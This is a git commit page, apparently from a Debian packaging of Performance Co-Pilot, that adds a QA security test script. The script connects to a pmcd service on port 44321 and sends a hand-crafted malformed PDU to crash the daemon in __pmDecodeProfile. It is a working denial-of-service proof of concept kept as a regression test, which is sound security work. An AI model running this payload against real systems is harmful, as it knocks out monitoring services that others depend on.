Debian 3.9.10debian/3.9.10 debian

author: Igor Pashev <pashev.igor@gmail.com> 2014-10-26 12:33:50 +0400
committer: Igor Pashev <pashev.igor@gmail.com> 2014-10-26 12:33:50 +0400
commit: 47e6e7c84f008a53061e661f31ae96629bc694ef (patch)
tree: 648a07f3b5b9d67ce19b0fd72e8caa1175c98f1a /qa/secure/crash-profile-instances
download: pcp-debian.tar.gz
1 files changed, 22 insertions, 0 deletions
diff --git a/qa/secure/crash-profile-instances b/qa/secure/crash-profile-instances
new file mode 100755
index 0000000..58a989e
--- /dev/null
+++ b/qa/secure/crash-profile-instances
@@ -0,0 +1,22 @@
+#
+# usage: python crash-profile-instances HOST
+#
+# Connects to pmcd on HOST and triggers a crash in __pmDecodeProfile.
+#
+# Florian Weimer / Red Hat Product Security Team
+#
+import socket
+import sys
+import pcppdu
+_, host = sys.argv
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, 44321))
+pcppdu.client_handshake(sock, from_=1)
+pcppdu.send_pmns_names(sock, from_=1, names=(str("hinv.ncpu"),))
+ids = pcppdu.parse_pmns_ids(pcppdu.read_pdu(sock))
+pmid = ids[1].idlist[0]
+pcppdu.send_desc_req(sock, from_=1, pmid=pmid)
+# print(pcppdu.parse_desc(pcppdu.read_pdu(sock)))
+sock.send(str('\x00\x00\x00(\x00\x00p\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
+
+sock.close()
author	Igor Pashev <pashev.igor@gmail.com>	2014-10-26 12:33:50 +0400
committer	Igor Pashev <pashev.igor@gmail.com>	2014-10-26 12:33:50 +0400
commit	47e6e7c84f008a53061e661f31ae96629bc694ef (patch)
tree	648a07f3b5b9d67ce19b0fd72e8caa1175c98f1a /qa/secure/crash-profile-instances
download	pcp-debian.tar.gz